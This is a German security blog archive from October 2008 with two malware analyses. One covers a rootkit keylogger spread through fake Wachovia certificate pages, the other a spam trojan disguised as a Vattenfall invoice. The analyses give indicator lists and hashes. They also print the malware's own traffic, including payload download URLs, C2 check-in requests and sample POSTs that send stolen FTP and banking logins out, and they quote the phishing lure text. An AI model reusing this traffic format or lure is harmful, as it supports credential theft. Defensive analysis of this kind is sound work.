Monthly Archive for October, 2008

Rootkit stiehlt FTP-, HTTP- und HTTPS-Logins

Trendmicro berichtete kürzlich von einem Trojaner, welcher FTP Logins aufzeichnet und diese zu einem Server sendet. Ich habe mir den Trojaner einmal etwas genauer angeschaut:

Der Trojaner verbreitet sich über infizierte Links in E-Mails. Klickt man auf einen der Links, gelangt man an eine der folgenden URLs:

http://ninonem.com/login.htm

http://repluy.com/login.htm

http://fgienrsi.com/GetStarted.htm

http://bberimc.com/GetStarted.htm

http://binrye.com/GetStarted.htm

http://unerixs.com/support.html

Die Domains werden auf einem FastFlux Botnet gehostet (Siehe dnsbl.abuse.ch FastFlux domain check):

Der Inhalt der Webseiten ist immer Derselbe:

Die Webseite möchte dem Besucher weiss machen, dass er doch das Security Plus Certificate der in der USA ansässigen Bank Wachovia herunterladen und installieren soll. In der Datei Sslupdate.exe befindet sich nicht etwas ein Sicherheits-Zertifikat, sonder viel mehr ein Trojaner namens Suceret / WebDown:

Filename: Sslupdate.exe
File size: 3188 bytes
MD5…: c4906f64d0ea19dab7a9e7626ee40781
SHA1..: 7301f0781b8a56f7b0fd59c531fa288d48c16d3e
Erkennungsrate: 16/36 (44.44%)

Führt man die Datei aus, nimmt der Trojaner sofort Kontakt mit lodnew.com auf, welche ebenfalls auf einem FastFlux Botnet gehostet wird, und lädt dort weiteren Schadcode nach:

GET http://loadnew.com/s.exe

Filename: s.exe
File size: 32256 bytes
MD5…: d951f3a8e3485c3c150ba17c0f53db86
SHA1..: 9d4e1df3237c34c85d14a5a477a5e2dc153edd42
Erkennungsrate: 5/36 (13.89%)

Der Trojaner richtet sich nun als Rootkit im System ein und installiert einen Keylogger der
Win32/Ursnif Familie:

C:\WINDOWS\9129837.exe
C:\WINDOWS\new_drv.sys
C:\WINDOWS\system32\8085.dll

Des Weiteren installiert der Trojaner einen Backdoor auf einem beliebigen TCP Port:

Nun kontaktiert er die Domain 1.alisiosanguera.com.cn (91.203.92.103):

GET 1.alisiosanguera.com.cn/cgi-bin/cmd.cgi?user_id=*HDSERIALNR*&version_id=289&passphrase=fkjvhsdvlksdhvlsd&socks=19726&version=125&crc=00000000

Bevor wir weiter auf diese URL eingehen, gibt es eine Quiz-Frage von mir: Was denkt ihr, in wessen Subnet liegt die IP-Adresse 91.203.92.103 (1.alisiosanguera.com.cn)? Genau, einmal mehr liegt diese IP-Adresse in den Händen der UATelecom! Bei Spamhaus gibt es auch bereits einen entsprechenden SBL dazu: SBL68462. Zurück zum Thema. In der URL werden folgende Informationen übermittelt:

user_id = Eindeutige Serien Nummer der HardDisk
version_id = ??
passphrase = ??
socks = TCP Port, auf welchem der Trojaner horcht
version= Version des installierten Trojaners
ctc= ??

Die genannte URL wird dabei in regelmässigen Abständen wieder kontaktiert. Soweit so gut. Richtig interessant wird es aber erst jetzt: Der Trojaner sammelt sämtliche Logins von HTTP, HTTPS und FTP Traffic und sendet die gestohlenen Logins an einen Server. Etwa im Fall einer FTP Verbindung sieht dies folgendermassen aus:

POST /cgi-bin/forms.cgi HTTP/1.1
User-Agent: IE
Host: 1.alisiosanguera.com.cn
Content-Length: 370
Cache-Control: no-cache

Content-Disposition: form-data; name=”upload_file”; filename=”4654654.342″
Content-Type: *ftpserver*.ch&ftp_login=anonymous&ftp_pass=IEUser@&version=0

Der Trojaner überträgt die IP Adresse des infizierten Servers inklusive Login sowie Server Adresse an den Server 1.alisiosanguera.com.cn (91.203.92.103). Das Gleiche gilt wie bereits erwähnt auch für HTTP und HTTPS Traffic. Hier das Beispiel eines eBanking Logins über eine scheinbar sichere HTTPS-Verbindung:

POST /cgi-bin/forms.cgi HTTP/1.1
User-Agent: IE
Host: 1.alisiosanguera.com.cn
Content-Length: 362
Cache-Control: no-cache

Content-Disposition: form-data; name=”upload_file”; filename=”4179642204.289″
Content-Type: application/octet-stream

URL: https://onlinebank.*.ch/?login
passw=*passwort*&login=*PIN/TAN*&p_userid=*vertragsnummer*

Wie man sehr schön sieht, überträgt der Trojaner URL, Vertragsnummer, Passwort sowie PIN/TAN der Onlinebank – die aber im Falle eines Einmal-PIN/TANs in diesem Moment für den Angreifer keinen Nutzen mehr hat. Ob Challenge-Response Verfahren moderner Telebanking-Systeme ebenfalls angegriffen werden, konnte ich mangels eines gültigen Kontos leider nicht testen.

Im Gegensatz zum Banken Trojaner WSNPoem und Torpig “schiesst” dieser Trojaner auf alles was ihm in die Quere kommt. Das heisst, er zielt nicht im Speziellen auf Banken oder andere spezifische Ziele ab sonder greift alles an, was nach einem Login aussieht. Der Einsatz von SSL schützt dabei nicht, da die Passwörter oberhalb des SSL-Layers abgegriffen wird.

Fazit

Die Spam-Mails, welche den Trojaner respektive die infizierten URLs beinhalten, werden derzeit zwar ausschliesslich in den USA versendet, jedoch ist die Malware (zumindest für mich) äusserst interessant: Am vergangenen Wochenende bin ich auf einen Command&Control Server gestossen, welcher einen anderen Trojaner mit FTP-Credentials von Webservern versorgt, damit dieser danach versucht, auf diesen Webservern DriveBy-Infektionen zu platzieren – also eine Infrastruktur zum verteilten Infizieren von Webservern. Es war mir möglich, dieses C&C anzuzapfen und mittlerweile eine (noch immer wachsende) Liste mit über 50′000 FTP Logins zu sammeln. Es ist anzunehmen, dass dieser Server eben über einen Keylogger wie dem Vorliegenden mit Passwörtern gefüttert wird. Möglicherweise besteht sogar ein direkter Zusammenhang zwischen diesen beiden Komponenten.

Es bleibt noch zu erwähnen, dass das Botnetz, welches die Domains hostet, früher bereites WSNPoem sowie verschiedene Money-Mule und phishing Domains gehostet hat.

Zu guter Letzt wie immer die Liste mit URLs und IPs, welche blockiert werden sollten:

  • ninonem.com
  • repluy.com
  • fgienrsi.com
  • bberimc.com
  • binrye.com
  • unerixs.com
  • securebbb.com
  • alisiosanguera.com.cn
  • loadnew.com
  • 91.203.92.103
  • zertifikat.ssl – Emold?

    Seit heute Nacht kurz nach 00:00 Uhr verbreitet sich ein noch unidentifizierter Trojaner (Emold?) über ein Spam-Welle:

    Betreff: Lastschrift
    Guten Tag!
    Ihr Abbuchungsauftrag Nr.06660022 wurde erfullt.
    Ein Betrag von 760.52 EURO wurde abgebucht und wird in Ihrem Bankauszug als “Vattenfallabbuchung ” angezeigt.
    Die Auflistung der Kosten finden Sie im Anhang in der Datei: Rechnung.

    Alle unsere Rechnungen sind mit einem Sicherheitszertifikat versehen – der ist fuer Sie nicht von Bedeutung

    Vattenfall Europe AG
    Chausseestra?e 23
    10115 Berlin

    Vertretungsberechtigter: Karl Treumeier
    Umsatzsteuerident-Nummer: DR123052388
    Handelsregisternummer HRB 74215B

    Der Betreff variiert:

  • Lastschrift
  • Inkasso
  • Ratenzahlung
  • Abbuchung erfolgt
  • Abbuchung
  • Amtsgerticht
  • Amtsgericht Koeln
  • Forderungsmanagement GmbH
  • 1 Rate
  • Der EURO Betrag sowie die Anzahlungs Nr. variieren ebenfalls. Im Attachement Rechnung.zip befinden sich zwei Dateien:

    Rechnung.txt
    zertifikat.ssl

    Bei der Datei Rechnung.txt handelt es sich bloss um eine Verknüpfung auf die Datei zertifikat.ssl, welche den eigentlichen Trojaner beinhaltet. Die Datei wird über die Verknüpfung mittels cmd.exe ausgeführt:

    %windir%\system32\cmd.exe /c zertifikat.ssl
    Filename: zertifikat.ssl
    MD5: 57127815d6864a495151e49c7bf7d192
    SHA1: 43a8e686d45c636f1260651ff29abb1a399d3933
    Erkenungsrate: 5/36 (13.89%)

    Nach der Infizierung nimmt der Trojaner Kontakt mit der Domain univnext.cn (218.93.202.102) auf:

    GET http://univnext.cn/ld.php

    Das Attachement sollte auf keinen Fall geöffnet werden. Des Weiteren gilt es, die Domains zu blockeiren:

  • univnext.cn
  • regect.mobi
  • UPDATE 10:44 Uhr

    Der Trojaner scheint noch weiteren Schadcode nach zu laden:

    GET http://regect.mobi/02.exe

    Filename: 02.exe
    File size: 45297 bytes
    MD5…: b8750fa07487b47dc6e1ae54347ddbcb
    SHA1..: 9c584d8cadc7fa47e2d2f647c3310571fe72816d
    Erkennungsrate: 8/36 (22.23%)




    economics-recluse
    Scene
    Urgent!